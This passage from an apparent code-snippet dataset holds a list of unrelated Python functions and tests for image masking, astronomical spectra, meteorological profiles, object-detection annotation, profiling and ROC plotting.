percentage_x=100, percentage_y=100, offset_x=0, offset_y=0, rotation=0, rectangle=True):\n ydim, xdim = img.shape\n mask = np.zeros((ydim, xdim))\n\n # Convert percentages to fractions\n offset_x = (xdim * offset_x/100)\n offset_y = (ydim * offset_y/100)\n percentage_x = percentage_x/100\n percentage_y = percentage_y/100\n\n if rectangle is False:\n x_rad = np.floor((img.shape[1]/2) * percentage_x)\n y_rad = np.floor((img.shape[0]/2) * percentage_y)\n\n x_center = img.shape[1]//2 + offset_x\n y_center = img.shape[0]//2 - offset_y\n\n\n [x, y] = draw.ellipse(y_center, x_center, y_rad, x_rad, shape = img.shape, rotation=rotation)\n\n else:\n ysub = ydim * (1 - percentage_y)\n y1 = max(ysub/2 - offset_y, 0)\n y2 = min(ydim - ysub/2 - offset_y, ydim)\n r_coords = np.array([y1, y1, y2, y2, y1])\n\n xsub = xdim * (1 - percentage_x)\n x1 = max(xsub/2 + offset_x,0)\n x2 = min(xdim - xsub/2 + offset_x, xdim)\n c_coords = np.array([x1, x2, x2, x1, x1])\n\n x, y = draw.polygon(r_coords, c_coords)\n\n mask[x, y] = 1\n\n return(mask)", "def ShowOneContour(index,all_images,all_pointing,thex0,they0,all_titles,object_name,all_expo,dir_top_img,all_filt,figname):\n plt.figure(figsize=(15,6))\n spec_index_min=100 # cut the left border\n spec_index_max=1900 # cut the right border\n star_halfwidth=70\n \n YMIN=-15\n YMAX=15\n \n figfilename=os.path.join(dir_top_img,figname) \n \n #center is approximately the one on the original raw image (may be changed)\n #x0=int(all_pointing[index][0])\n x0=int(thex0[index])\n \n \n # Extract the image \n full_image=np.copy(all_images[index])\n \n # refine center in X,Y\n star_region_X=full_image[:,x0-star_halfwidth:x0+star_halfwidth]\n \n profile_X=np.sum(star_region_X,axis=0)\n profile_Y=np.sum(star_region_X,axis=1)\n\n NX=profile_X.shape[0]\n NY=profile_Y.shape[0]\n \n X_=np.arange(NX)\n Y_=np.arange(NY)\n \n avX,sigX=weighted_avg_and_std(X_,profile_X**4) # take squared on purpose (weigh must be >0)\n avY,sigY=weighted_avg_and_std(Y_,profile_Y**4)\n \n x0=int(avX+x0-star_halfwidth)\n \n \n # find the center in Y on the spectrum\n yprofile=np.sum(full_image[:,spec_index_min:spec_index_max],axis=1)\n y0=np.where(yprofile==yprofile.max())[0][0]\n\n # cut the image in vertical and normalise by exposition time\n reduc_image=full_image[y0-20:y0+20,x0:spec_index_max]/all_expo[index] \n reduc_image[:,0:100]=0 # erase central star\n \n X_Size_Pixels=np.arange(0,reduc_image.shape[1])\n Y_Size_Pixels=np.arange(0,reduc_image.shape[0])\n Transverse_Pixel_Size=Y_Size_Pixels-int(float(Y_Size_Pixels.shape[0])/2.)\n \n # calibration in wavelength\n #grating_name=all_filt[index].replace('dia ','')\n grating_name=get_disperser_filtname(all_filt[index])\n \n lambdas=Pixel_To_Lambdas(grating_name,X_Size_Pixels,all_pointing[index],True)\n \n #if grating_name=='Ron200':\n # holo = Hologram('Ron400',verbose=True)\n #else: \n # holo = Hologram(grating_name,verbose=True)\n #lambdas=holo.grating_pixel_to_lambda(X_Size_Pixels,all_pointing[index])\n #if grating_name=='Ron200':\n # lambdas=lambdas*2.\n \n\n X,Y=np.meshgrid(lambdas,Transverse_Pixel_Size) \n T=np.transpose(reduc_image)\n \n \n plt.contourf(X, Y, reduc_image, 100, alpha=1., cmap='jet',origin='lower')\n C = plt.contour(X, Y, reduc_image , 20, colors='black', linewidth=.5,origin='lower')\n \n \n for line in LINES:\n if line == O2 or line == HALPHA or line == HBETA or line == HGAMMA:\n plt.plot([line['lambda'],line['lambda']],[YMIN,YMAX],'-',color='lime',lw=0.5)\n plt.text(line['lambda'],YMAX-3,line['label'],verticalalignment='bottom', horizontalalignment='center',color='lime', fontweight='bold',fontsize=16)\n \n \n \n plt.axis([X.min(), X.max(), Y.min(), Y.max()]); plt.grid(True)\n plt.title(all_titles[index])\n plt.grid(color='white', ls='solid')\n plt.text(200,-5.,all_filt[index],verticalalignment='bottom', horizontalalignment='center',color='yellow', fontweight='bold',fontsize=16)\n plt.xlabel('$\\lambda$ (nm)')\n plt.ylabel('pixels')\n plt.ylim(YMIN,YMAX)\n plt.xlim(0.,1200.)\n plt.savefig(figfilename)", "def test_profile_filtering(instr_task_workbench, instr_view):\n add_profile(instr_task_workbench, 'fp5', 'Dummy.dumb.002')\n p = instr_task_workbench.get_plugin('ecpy.instruments')\n filtered = instr_view.filter_profiles(p._profiles)\n assert 'fp5' not in filtered\n\n add_profile(instr_task_workbench, 'fp6', 'Dummy.dumb.003')\n p = instr_task_workbench.get_plugin('ecpy.instruments')\n filtered = instr_view.filter_profiles(p._profiles)\n assert 'fp6' in filtered", "def test_annotate_blank(self):\n x_size = 500\n y_size = 500\n\n label = li.Label(\"Test Label\", (0.20, 0.20))\n test_im = li.ImageBlank(None, x_size, y_size)\n test_im.annotate(label)\n annotated_im = test_im.data\n\n # Ensure the shape is retained\n shape_expected = (y_size, x_size, 4)\n shape_test = annotated_im.shape\n self.assertEqual(\n shape_test, shape_expected, msg=\"shape not retained after annotation\"\n )\n\n # Test that there are darker text areas\n flattened = annotated_im[..., :3].mean(axis=-1)\n n_black_pixels = (flattened < 10).sum()\n\n self.assertGreater(n_black_pixels, 50, msg=\"Not enough black/text pixels\")\n self.assertLess(n_black_pixels, 5000, msg=\"Too many black/text pixels\")", "def coherenceProfiles(wfr, Fx = 1/3, Fy = 1/3):\n \n print(\"----Starting coherenceProfiles Function---\")\n \n Sx = int(Fx*wfr.params.Mesh.nx)\n Sy = int(Fy*wfr.params.Mesh.ny)\n print(\"Sampled area (pixels): {}\".format([Sx,Sy]))\n \n if Sx > 120 or Sy > 120:\n print(\"Error: Sampled area of wavefront is too large. Change Fx/Fy to a smaller value\")\n import sys\n sys.exit()\n \n start1 = time.time()\n cfr = getComplex(wfr)\n end1 = time.time()\n print('Time taken to convert to complex wavefield (s): {}'.format(end1 - start1))\n \n _x0 = 0 # These are in _pixel_ coordinates!!\n _y0 = 0\n _x1 = int(np.max(np.shape(cfr[:,0,0]))) # These are in _pixel_ coordinates!!\n _y1 = int(np.max(np.shape(cfr[0,:,0])))\n \n print(\"Nx (pixels): {}\".format(_x1))\n print(\"Ny (pixels): {}\".format(_y1))\n \n numx = _x1 - _x0 # number of points for line profile\n numy = _y1 - _y0\n midX = int(numx/2)\n midY = int(numy/2)\n \n print(\"midX & midY : {}\".format((midX,midY)))\n \n # # Fraction of wavefront to calculate coherence over\n # Fx = 1/3\n # Fy = 1/3\n \n ROI = ((int(midX-((Fx)*midX)),int(midY-((Fy)*midY))),\n (int(midX+((Fx)*midX)),int(midY+((Fy)*midY)))) \n \n lX = ROI[1][0]-ROI[0][0]\n lY = ROI[1][1]-ROI[0][1]\n \n print(\"Region of interest (pixels): {}\".format((lX,lY)))\n \n x0,y0 = ROI[0][0], ROI[0][1]\n x1,y1 = ROI[1][0], ROI[1][1]\n \n print(\"Region of interest again (x0,x1,y0,y1):{},{}\".format((x0,x1),(y0,y1)))\n \n A = cfr[x0:x1,y0:y1]\n \n print(\"Shape of sampled array A: {}\".format(np.shape(A)))\n \n \"\"\" Mutual Coherence Function \"\"\"\n start2 = time.time()\n Bx = np.array([A[:,int(lY/2)].conjugate() * a for a in A[:,int(lY/2)]])\n By = np.array([A[int(lX/2),:].conjugate() * a for a in A[int(lX/2),:]])\n end2 = time.time()\n print('Time taken to calculate coherence (s): {}'.format(end2 - start2))\n \n print(\"Shape of Bx: {}\".format(np.shape(Bx)))\n print(\"Shape of By: {}\".format(np.shape(By)))\n \n \n Dx = Fx*wfr.params.Mesh.xMax - Fx*wfr.params.Mesh.xMin\n Dy = Fy*wfr.params.Mesh.yMax - Fy*wfr.params.Mesh.yMin\n \n \"\"\" Creating array of custom tick markers for plotting \"\"\"\n tickAx = [round_sig(-Dx*1e6/2),round_sig(-Dx*1e6/4),0,round_sig(Dx*1e6/4),round_sig(Dx*1e6/2)]\n tickAy = [round_sig(Dy*1e6/2),round_sig(Dy*1e6/4),0,round_sig(-Dy*1e6/4),round_sig(-Dy*1e6/2)]\n \n # print(\"Array of horizontal markers: {}\".format(tickAx))\n # print(\"Array of vertical markers: {}\".format(tickAy))\n \n plt.imshow(abs(Bx))\n plt.title(\"(x0-x1)\")\n plt.xticks(np.arange(0,lX+1,lX/4),tickAx)\n plt.xlabel(\"x1-x0 [\\u03bcm]\")#\"(\\u03bcm)\")\n plt.yticks(np.arange(0,lY+1,lY/4),tickAy)\n plt.ylabel(\"x1-x0 [\\u03bcm]\")#\"(\\u03bcm)\")\n plt.colorbar()\n plt.show() \n \n plt.imshow(abs(By))\n plt.title(\"(y0-y1)\")\n plt.xticks(np.arange(0,lX+1,lX/4),tickAx)\n plt.xlabel(\"y1-y0 [\\u03bcm]\")#\"(\\u03bcm)\")\n plt.yticks(np.arange(0,lY+1,lY/4),tickAy)\n plt.ylabel(\"y1-y0 [\\u03bcm]\")#\"(\\u03bcm)\")\n plt.colorbar()\n plt.show()\n\n \n # Cx = abs(Bx.mean(0))\n # Cy = abs(By.mean(0))\n \n # plt.imshow(Cx)#,vmin=np.min(C),vmax=np.max(C))\n # plt.title(\"Degree of Coherence (Horizontal) (mean)\")\n # plt.colorbar()\n # plt.show() \n \n # plt.imshow(Cy)#,vmin=np.min(C),vmax=np.max(C))\n # plt.title(\"Degree of Coherence (Horizontal) (mean)\")\n # plt.colorbar()\n # plt.show() \n \n # \"\"\" Normalised Degree of Coherence \"\"\"\n # U = (abs(B.mean(0))/(abs(A.conjugate()*A)))", "def plot_profiles(snap, profs, dust_species_to_plot, debug=False):\n print('Plotting profiles...')\n\n units = {\n 'position': 'au',\n 'gas_velocity_radial_analytical': 'dimensionless',\n 'dust_velocity_radial_analytical': 'dimensionless',\n 'velocity_radial_numerical': 'dimensionless',\n }\n p = profs['gas'][0]\n\n if debug:\n num_dust = snap.num_dust_species\n ax = p.plot(x='radius', y=['velocity_pressure', 'velocity_visc'], units=units)\n y = ['gas_velocity_radial']\n y += [f'dust_velocity_radial_{idx+1:03}' for idx in range(num_dust)]\n ax = p.plot(x='radius', y=y, units=units)\n ax.legend().remove()\n\n fig, ax = plt.subplots()\n\n # Plot \"analytical\" radial drift velocity / velocity pressure component\n p.plot(\n x='radius',\n y='gas_velocity_radial_analytical',\n units=units,\n color='black',\n label='',\n ax=ax,\n )\n y = [f'dust_velocity_radial_analytical_{idx+1:03}' for idx in dust_species_to_plot]\n p.plot(x='radius', y=y, units=units, label='', ax=ax)\n colors = [line.get_color() for line in ax.lines[1:]]\n\n # Plot \"numerical\" radial drift velocity / velocity pressure component\n p.plot(\n x='radius',\n y='velocity_radial_numerical',\n units=units,\n color='black',\n linestyle='',\n marker='o',\n markersize=4,\n fillstyle='none',\n label='gas',\n std='shading',\n ax=ax,\n )\n profs_to_plot = [\n prof for idx, prof in enumerate(profs['dust']) if idx in dust_species_to_plot\n ]\n for species, prof, color in zip(dust_species_to_plot, profs_to_plot, colors):\n label = f'{snap.properties[\"grain_size\"][species].to(\"cm\"):.1f~P}'\n prof.plot(\n x='radius',\n y='velocity_radial_numerical',\n units=units,\n color=color,\n linestyle='',\n marker='o',\n markersize=4,\n fillstyle='none',\n label=label,\n std='shading',\n ax=ax,\n )\n\n ax.set_ylabel(r'$v_R / |v_P|$')\n ax.grid()\n\n textstr = f't = {snap.properties[\"time\"].to(\"years\").m:.0f} years'\n bbox = dict(boxstyle='round', facecolor='white', edgecolor='grey', alpha=0.8)\n ax.text(\n 0.97,\n 0.97,\n textstr,\n transform=ax.transAxes,\n horizontalalignment='right',\n verticalalignment='top',\n bbox=bbox,\n )\n ax.legend(framealpha=0.8, edgecolor='grey')\n\n return ax", "def test_profile_with_nans():\n pressure = np.array([1001, 1000, 997, 977.9, 977, 957, 937.8, 925, 906, 899.3, 887, 862.5,\n 854, 850, 800, 793.9, 785, 777, 771, 762, 731.8, 726, 703, 700, 655,\n 630, 621.2, 602, 570.7, 548, 546.8, 539, 513, 511, 485, 481, 468,\n 448, 439, 424, 420, 412]) * units.hPa\n temperature = np.array([-22.5, -22.7, -23.1, np.nan, -24.5, -25.1, np.nan, -24.5, -23.9,\n np.nan, -24.7, np.nan, -21.3, -21.3, -22.7, np.nan, -20.7, -16.3,\n -15.5, np.nan, np.nan, -15.3, np.nan, -17.3, -20.9, -22.5,\n np.nan, -25.5, np.nan, -31.5, np.nan, -31.5, -34.1, -34.3,\n -37.3, -37.7, -39.5, -42.1, -43.1, -45.1, -45.7, -46.7]\n ) * units.degC\n dewpoint = np.array([-25.1, -26.1, -26.8, np.nan, -27.3, -28.2, np.nan, -27.2, -26.6,\n np.nan, -27.4, np.nan, -23.5, -23.5, -25.1, np.nan, -22.9, -17.8,\n -16.6, np.nan, np.nan, -16.4, np.nan, -18.5, -21, -23.7, np.nan,\n -28.3, np.nan, -32.6, np.nan, -33.8, -35, -35.1, -38.1, -40,\n -43.3, -44.6, -46.4, -47, -49.2, -50.7]) * units.degC\n lfc_p, _ = lfc(pressure, temperature, dewpoint)\n profile = parcel_profile(pressure, temperature[0], dewpoint[0])\n cape, cin = cape_cin(pressure, temperature, dewpoint, profile)\n sbcape, sbcin = surface_based_cape_cin(pressure, temperature, dewpoint)\n mucape, mucin = most_unstable_cape_cin(pressure, temperature, dewpoint)\n assert_nan(lfc_p, units.hPa)\n assert_almost_equal(cape, 0 * units('J/kg'), 0)\n assert_almost_equal(cin, 0 * units('J/kg'), 0)\n assert_almost_equal(sbcape, 0 * units('J/kg'), 0)\n assert_almost_equal(sbcin, 0 * units('J/kg'), 0)\n assert_almost_equal(mucape, 0 * units('J/kg'), 0)\n assert_almost_equal(mucin, 0 * units('J/kg'), 0)", "def on_draw_over_image(self):", "def draw_annotation(img, boxes, klass, polygons=None, is_crowd=None):\n labels = []\n assert len(boxes) == len(klass)\n if is_crowd is not None:\n assert len(boxes) == len(is_crowd)\n for cls, crd in zip(klass, is_crowd):\n clsname = cfg.DATA.CLASS_NAMES[cls]\n if crd == 1:\n clsname += ';Crowd'\n labels.append(clsname)\n else:\n for cls in klass:\n labels.append(cfg.DATA.CLASS_NAMES[cls])\n img = viz.draw_boxes(img, boxes, labels)\n\n if polygons is not None:\n for p in polygons:\n mask = polygons_to_mask(p, img.shape[0], img.shape[1])\n img = draw_mask(img, mask)\n return img", "def setprofile(self, w_func):\n if self.space.is_w(w_func, self.space.w_None):\n self.profilefunc = None\n self.w_profilefuncarg = None\n else:\n self.setllprofile(app_profile_call, w_func)", "def annotate_image(self, image, results):\n predictedObjects = []\n for i in range(len(results)):\n objectParameters = []\n x = int(results[i][1])\n y = int(results[i][2])\n w = int(results[i][3])\n h = int(results[i][4])\n # print(x, y, w, h, results[i][0])\n imageHeight, imageWidth, _ = image.shape\n w = w // 2\n h = h // 2\n # change to truncate boxes which go outside the image\n xmin, xmax, ymin, ymax = 0, 0, 0, 0\n xmin = 3 if not max(x - w, 0) else (x - w)\n xmax = imageWidth - 3 if not min(x + w - imageWidth, 0) \\\n else (x + w)\n ymin = 1 if not max(y - h, 0) else (y - h)\n ymax = imageHeight - 3 if not min(y + h - imageHeight, 0) \\\n else (y + h)\n if self.verbose:\n print('Class : ' + results[i][0] + ', [x, y, w, h] [' +\n str(x) + ', ' + str(y) + ', ' + str(w) + ', ' + str(h) +\n '] Confidence : ' + str(results[i][5]))\n \n # Each class must have a unique color\n color = tuple([(j * (1+self.classes.index(results[i][0])) % 255) \\\n for j in self.seed])\n cv2.rectangle(image, (xmin, ymin), (xmax, ymax), color, 2)\n if ymin <= 20:\n cv2.rectangle(\n image, (xmin, ymin), (xmax, ymin + 20), color, -1\n )\n cv2.putText(\n image, results[i][0] + ': %.2f' % results[i][5],\n (xmin+5, ymin+15), cv2.FONT_HERSHEY_SIMPLEX, 0.5,\n (255, 255, 255), 2\n )\n else:\n cv2.rectangle(image, (xmin, ymin), (xmax, ymin-20), color, -1)\n cv2.putText(\n image, results[i][0] + ': %.2f' % results[i][5],\n (xmin+5, ymin-8), cv2.FONT_HERSHEY_SIMPLEX, 0.5,\n (255, 255, 255), 2\n )\n objectParameters = [\n results[i][0], xmin, ymin, xmax, ymax, results[i][5]\n ]\n predictedObjects.append(objectParameters)\n return image, predictedObjects\n # if self.outputFile:\n # cv2.imwrite(self.outputFile,image)", "def stop_if_active(self,\n func,\n profile_id,\n profiler,\n sort_by):\n # Disable the profiler & log the output\n if self._active(profile_id):\n profiler.disable()\n\n buf = BytesIO()\n\n ps = pstats.Stats(profiler,\n stream=buf)\n ps.sort_stats(sort_by)\n ps.print_stats()\n\n logging.info(u'Profile (Profile ID = {id}) for \"{mod}.{name}\":\\n{stats}'\n .format(id=profile_id,\n mod=func.__module__,\n name=func.__name__,\n stats=buf.getvalue()))", "def test_get_spawning_profile_list():\n center = Coordinates(1 , 1)\n radius = 10\n speed_limit = 20\n default_driver = DriverProfile(\"Default\", 8, 2, 2, 0, 30, 3, 1)\n default_vehicle = VehicleProfile(\"Default\", 5, 15, 2, 2, 1000, 65)\n default_spawn = SpawningProfile(\"Default\", default_driver, default_vehicle)\n\n i = Intersection(center, radius, speed_limit)\n\n l = i.get_spawning_profile_list()\n\n assert not l\n\n i.add_spawning_profile(default_spawn)\n\n assert l\n\n assert len(l) == 1\n\n i.remove_spawning_profile(default_spawn)\n\n assert len(l) == 0\n assert not l", "def check_profile(args):\n with_dataset(args, Dataset._check_profile)", "def prepro(I):\n I = I[35:195] # crop\n I = I[::2,::2,0] # downsample by a factor of 2\n I[I == 144] = 0 # erase background (bg type 1)\n I[I == 109] = 0 # erase background (bg type 2)\n I[I != 0] = 1 # set everything else (ball, paddles) to 1\n return I.astype(np.float)", "def profile_step(self):\n import profile\n\n profile.run(\"world.step()\")", "def pre_draw(self):", "def __drawAndErase(self, boxToDraw, boxToErase=None):\n dc = wx.ClientDC(self.drawingSurface)\n dc.BeginDrawing()\n dc.SetPen(wx.Pen(wx.WHITE, 1, wx.DOT))\n dc.SetBrush(wx.TRANSPARENT_BRUSH)\n dc.SetLogicalFunction(wx.XOR)\n if boxToErase:\n r = wx.Rect(*boxToErase)\n dc.DrawRectangleRect(r)\n\n r = wx.Rect(*boxToDraw)\n dc.DrawRectangleRect(r)\n dc.EndDrawing()", "def _seg_image(self, x, y, r_cut=100):\n snr=self.snr\n npixels=self.npixels\n bakground = self.bakground\n error= self.bkg_rms(x,y,r_cut)\n kernel = self.kernel\n image_cutted = self.cut_image(x,y,r_cut)\n image_data = image_cutted\n threshold_detect_objs=detect_threshold(data=image_data, nsigma=snr,error=error)\n segments=detect_sources(image_data, threshold_detect_objs, npixels=npixels, filter_kernel=kernel)\n segments_deblend = deblend_sources(image_data, segments, npixels=npixels,nlevels=10)\n segments_deblend_info = source_properties(image_data, segments_deblend)\n nobjs = segments_deblend_info.to_table(columns=['id'])['id'].max()\n xcenter = segments_deblend_info.to_table(columns=['xcentroid'])['xcentroid'].value\n ycenter = segments_deblend_info.to_table(columns=['ycentroid'])['ycentroid'].value\n image_data_size = np.int((image_data.shape[0] + 1) / 2.)\n dist = ((xcenter - image_data_size) ** 2 + (ycenter - image_data_size) ** 2) ** 0.5\n c_index = np.where(dist == dist.min())[0][0]\n center_mask=(segments_deblend.data==c_index+1)*1 #supposed to be the data mask\n obj_masks = []\n for i in range(nobjs):\n mask = ((segments_deblend.data==i+1)*1)\n obj_masks.append(mask)\n xmin = segments_deblend_info.to_table(columns=['bbox_xmin'])['bbox_xmin'].value\n xmax = segments_deblend_info.to_table(columns=['bbox_xmax'])['bbox_xmax'].value\n ymin = segments_deblend_info.to_table(columns=['bbox_ymin'])['bbox_ymin'].value\n ymax = segments_deblend_info.to_table(columns=['bbox_ymax'])['bbox_ymax'].value\n xmin_c, xmax_c = xmin[c_index], xmax[c_index]\n ymin_c, ymax_c = ymin[c_index], ymax[c_index]\n xsize_c = xmax_c - xmin_c\n ysize_c = ymax_c - ymin_c\n if xsize_c > ysize_c:\n r_center = np.int(xsize_c)\n else:\n r_center = np.int(ysize_c)\n center_mask_info= [center_mask, r_center, xcenter, ycenter, c_index]\n return obj_masks, center_mask_info, segments_deblend", "def get_instance(self, index):\n # start = time.time()\n # Load the source image and its annotations\n img = self.load_image(index)\n w_img, h_img = img.size\n w, h = 2*self.image_size[0], 2*self.image_size[1]\n anns = self.load_annotations(index)\n # print(\"Loading time = {:.5f}s\".format(time.time() - start))\n # start = time.time()\n img = img.resize((w, h))\n\n # Initialize blank masks for each target class\n masks = {label: Image.new(\"L\", (w, h)) for label in self.target_classes}\n draw_masks = {label: ImageDraw.Draw(masks[label]) for label in self.target_classes}\n combined_mask = Image.new(\"L\", (w, h))\n combined_draw_mask = ImageDraw.Draw(combined_mask)\n\n # Get valid present annotations\n anns = [x for x in anns if type(x) == dict]\n \n # Combine some classes\n for i in range(len(anns)):\n anns[i] = {k.replace('Circular Crypts', 'Good Crypts'): v for k, v in anns[i].items()}\n\n # Gathering polygon points - A dict of points for each target class\n poly_pts = {label: [] for label in self.target_classes}\n for ann in anns:\n if ann['label'] in self.target_classes:\n pts = np.array(ann['points'])\n pts[:, 0] = pts[:, 0] * (w*1. / w_img)\n pts[:, 1] = pts[:, 1] * (h*1. / h_img)\n poly_pts[ann['label']].append(pts)\n\n # Drawing the masks\n for label in self.target_classes:\n if label != \"Interpretable Region\":\n polygons = poly_pts[label]\n for poly in polygons:\n coords = [(pt[0], pt[1]) for pt in poly]\n draw_masks[label].polygon(xy=coords, fill=255)\n combined_draw_mask.polygon(coords, 255)\n \n # Making the Interpretable Region mask\n if (self.mode == 'seg' or self.mode == 'full') and 'Interpretable Region' in self.target_classes:\n pink_mass = img.copy()\n enhancer = ImageEnhance.Contrast(pink_mass)\n pink_mass = enhancer.enhance(4.0)\n pink_mass = np.array(pink_mass)\n pink_mass = 255 - ((pink_mass[:, :, 0] > 150) * (pink_mass[:, :, 1] > 150) * (pink_mass[:, :, 2] > 150)) * 255\n IRs = poly_pts[\"Interpretable Region\"]\n IR_image = Image.new('L', (w, h))\n IR_draw_image = ImageDraw.Draw(IR_image)\n for i in range(len(IRs)):\n IR = IRs[i]\n IR = [(p[0], p[1]) for p in IR]\n IR_draw_image.polygon(IR, 255)\n pink_mass *= np.array(IR_image) // 255\n pink_mass = Image.fromarray(pink_mass.astype(np.uint8))\n masks['Interpretable Region'] = pink_mass\n\n # Gathering IR boxes in format x, y, w, h where x, y are top left coords\n bboxes = []\n if (self.mode == 'loc' or self.mode == 'full') and \"Interpretable Region\" in self.target_classes:\n IRs = poly_pts[\"Interpretable Region\"]\n for i in range(len(IRs)):\n IR = IRs[i]\n IR = [(p[0], p[1]) for p in IR]\n IR_image = Image.new('L', (w, h))\n IR_draw_image = ImageDraw.Draw(IR_image)\n IR_draw_image.polygon(IR, 255)\n mul_img_arr = (np.array(IR_image)/255.) * (np.array(combined_mask)/255.)\n mul_img_arr = np.array(mul_img_arr*255, np.uint8)\n xmin, ymin, xmax, ymax = self.points(mul_img_arr)\n bboxes.append([xmin, ymin, xmax, ymax])\n bboxes = np.array(bboxes)\n\n # print(\"Parsing time = {:.5f}s\".format(time.time() - start))\n # start = time.time()\n\n # Visualizing the final data sample mask\n if debug:\n img.show()\n # debug_image = Image.new('RGB', img.size)\n debug_image = np.zeros((img.size[1], img.size[0], 3), np.uint8)\n debug_image[:, :, 0] = np.array(masks['Good Crypts'])\n debug_image[:, :, 1] = np.array(masks['Good Villi'])\n debug_image[:, :, 2] = np.array(masks['Epithelium'])\n if \"Brunner's Gland\" in masks:\n debug_image += np.expand_dims((np.array(masks[\"Brunner's Gland\"])//2), -1)\n if \"Interpretable Region\" in masks:\n debug_image[:, :, :2] += np.expand_dims((np.array(masks[\"Interpretable Region\"])), -1)\n debug_image = Image.fromarray(debug_image)\n debug_draw = ImageDraw.Draw(debug_image)\n for IR in poly_pts['Interpretable Region']:\n IR = [(p[0], p[1]) for p in IR]\n debug_draw.polygon(IR, fill=None, outline=\"#ffffff\")\n for bbox in bboxes:\n print(bbox)\n debug_draw.rectangle([bbox[0], bbox[1], bbox[2], bbox[3]], outline=\"#ff00ff\", width=4)\n debug_image.show()\n\n # Perform random augmentations\n if self.augment:\n img, masks, bboxes = self.augment_instance(img, masks, bboxes)\n\n # Visualizing the final data sample mask\n if debug:\n # debug_image = Image.new('RGB', img.size)\n debug_image = np.zeros((img.size[1], img.size[0], 3), np.uint8)\n debug_image[:, :, 0] = np.array(masks['Good Crypts'])\n debug_image[:, :, 1] = np.array(masks['Good Villi'])\n debug_image[:, :, 2] = np.array(masks['Epithelium'])\n if \"Brunner's Gland\" in masks:\n debug_image += np.expand_dims((np.array(masks[\"Brunner's Gland\"])//2), -1)\n if \"Interpretable Region\" in masks:\n debug_image[:, :, :2] += np.expand_dims((np.array(masks[\"Interpretable Region\"])), -1)\n debug_image = Image.fromarray(debug_image)\n debug_draw = ImageDraw.Draw(debug_image)\n for bbox in bboxes:\n print(bbox)\n debug_draw.rectangle([bbox[0], bbox[1], bbox[2], bbox[3]], outline=\"#ff00ff\", width=4)\n debug_image.show()\n\n # Preprocess the image, masks and bboxes\n img, masks, box_grid = self.preprocess_instance(img, masks, bboxes)\n \n # print(\"Aug and preprocess time = {:.5f}s\".format(time.time() - start))\n # start = time.time()\n\n return img, masks, box_grid", "def skip_sample_for_balanced_class(self, img_data):\n class_in_img = False\n for bbox in img_data['bboxes']:\n cls_name = bbox['class']\n if cls_name == self.curr_class:\n class_in_img = True\n ## 更新一次,获取下一次的值\n self.curr_class = next(self.class_cycle)\n break \n if class_in_img:\n return False\n else:\n return True", "def detect_nash_balancing_profil(dico_profs_Vis_Perf_t, \r\n arr_pl_M_T_vars_modif, t):\r\n nash_profils = list()\r\n dico_nash_profils = dict()\r\n cpt_nash = 0\r\n for key_modes_prof, dico_Vi_Pref_t in dico_profs_Vis_Perf_t.items():\r\n cpt_players_stables = 0\r\n dico_profils = dict()\r\n for num_pl_i, mode_i in enumerate(key_modes_prof): # 0 <= num_pl_i < m_player \r\n Vi, ben_i, cst_i = dico_Vi_Pref_t[fct_aux.RACINE_PLAYER\\\r\n +\"_\"+str(num_pl_i)]\r\n state_i = arr_pl_M_T_vars_modif[num_pl_i, t, \r\n fct_aux.AUTOMATE_INDEX_ATTRS[\"state_i\"]]\r\n gamma_i = arr_pl_M_T_vars_modif[num_pl_i, t, \r\n fct_aux.AUTOMATE_INDEX_ATTRS[\"gamma_i\"]]\r\n setx = arr_pl_M_T_vars_modif[num_pl_i, t, \r\n fct_aux.AUTOMATE_INDEX_ATTRS[\"set\"]]\r\n prod_i = arr_pl_M_T_vars_modif[num_pl_i, t, \r\n fct_aux.AUTOMATE_INDEX_ATTRS[\"prod_i\"]]\r\n cons_i = arr_pl_M_T_vars_modif[num_pl_i, t, \r\n fct_aux.AUTOMATE_INDEX_ATTRS[\"cons_i\"]]\r\n r_i = arr_pl_M_T_vars_modif[num_pl_i, t, \r\n fct_aux.AUTOMATE_INDEX_ATTRS[\"r_i\"]]\r\n mode_i_bar = None\r\n mode_i_bar = fct_aux.find_out_opposite_mode(state_i, mode_i)\r\n new_key_modes_prof = list(key_modes_prof)\r\n new_key_modes_prof[num_pl_i] = mode_i_bar\r\n new_key_modes_prof = tuple(new_key_modes_prof)\r\n \r\n Vi_bar = None\r\n Vi_bar, ben_i_bar, cst_i_bar \\\r\n = dico_profs_Vis_Perf_t[new_key_modes_prof]\\\r\n [fct_aux.RACINE_PLAYER+\"_\"+str(num_pl_i)]\r\n if Vi >= Vi_bar:\r\n cpt_players_stables += 1\r\n dico_profils[fct_aux.RACINE_PLAYER+\"_\"+str(num_pl_i)+\"_t_\"+str(t)] \\\r\n = {\"set\":setx, \"state\":state_i, \"mode_i\":mode_i, \"Vi\":Vi, \r\n \"gamma_i\":gamma_i, \"prod\":prod_i, \"cons\":cons_i, \"r_i\":r_i,\r\n \"ben\":ben_i, \"cst\":cst_i}\r\n \r\n dico_profils[\"mode_profil\"] = key_modes_prof \r\n \r\n if cpt_players_stables == len(key_modes_prof):\r\n nash_profils.append(key_modes_prof)\r\n Perf_t = dico_profs_Vis_Perf_t[key_modes_prof][\"Perf_t\"]\r\n dico_profils[\"Perf_t\"] = Perf_t\r\n dico_nash_profils[\"NASH_\"+str(cpt_nash)] = (dico_profils)\r\n cpt_nash += 1\r\n \r\n return nash_profils, dico_nash_profils", "def performancePlot(plot=\"ROC\"):\n fig, ax = plt.subplots()\n colors = {\"ML\": \"red\", \"Null YFP\": \"gold\", \"Null DAPI\": \"blue\"}\n mapp = pickle.load(open(\"pickles/mapp_fold_-1.pk\", \"rb\"))\n null_mapp = pickle.load(open(\"pickles/null_YFP_mapp_fold_-1.pk\", \"rb\"))\n null_DAPI_mapp = pickle.load(open(\"pickles/null_DAPI_mapp_fold_-1.pk\", \"rb\"))\n \n i = 0\n for m in [mapp, null_mapp, null_DAPI_mapp]:\n coordinates = [] #list of tuples (thresh, x point, y point) to plot\n for key in m: ##for each threshold\n TPs = sum([x[0] for x in m[key]])\n FPs = sum([x[1] for x in m[key]])\n TNs = sum([x[2] for x in m[key]])\n FNs = sum([x[3] for x in m[key]])\n if plot == \"PRC\":\n x = TPs / float(TPs + FNs) #recall (TPR)\n y = TPs / float(TPs + FPs) #precision\n if plot == \"ROC\":\n x = FPs / float(FPs + TNs) #FPR \n y = TPs / float(TPs + FNs) #recall (TPR)\n if not (np.isnan(x) or np.isnan(y)): \n coordinates.append((key, x, y))\n coordinates = sorted(coordinates, key=lambda x: x[0]) ##sort by threshold\n x = [t[1] for t in coordinates][::-1]\n y = [t[2] for t in coordinates][::-1]\n # print(i, coordinates)\n # thresholds = [entry[0] for entry in coordinates]\n # for j, txt in enumerate(thresholds):\n # 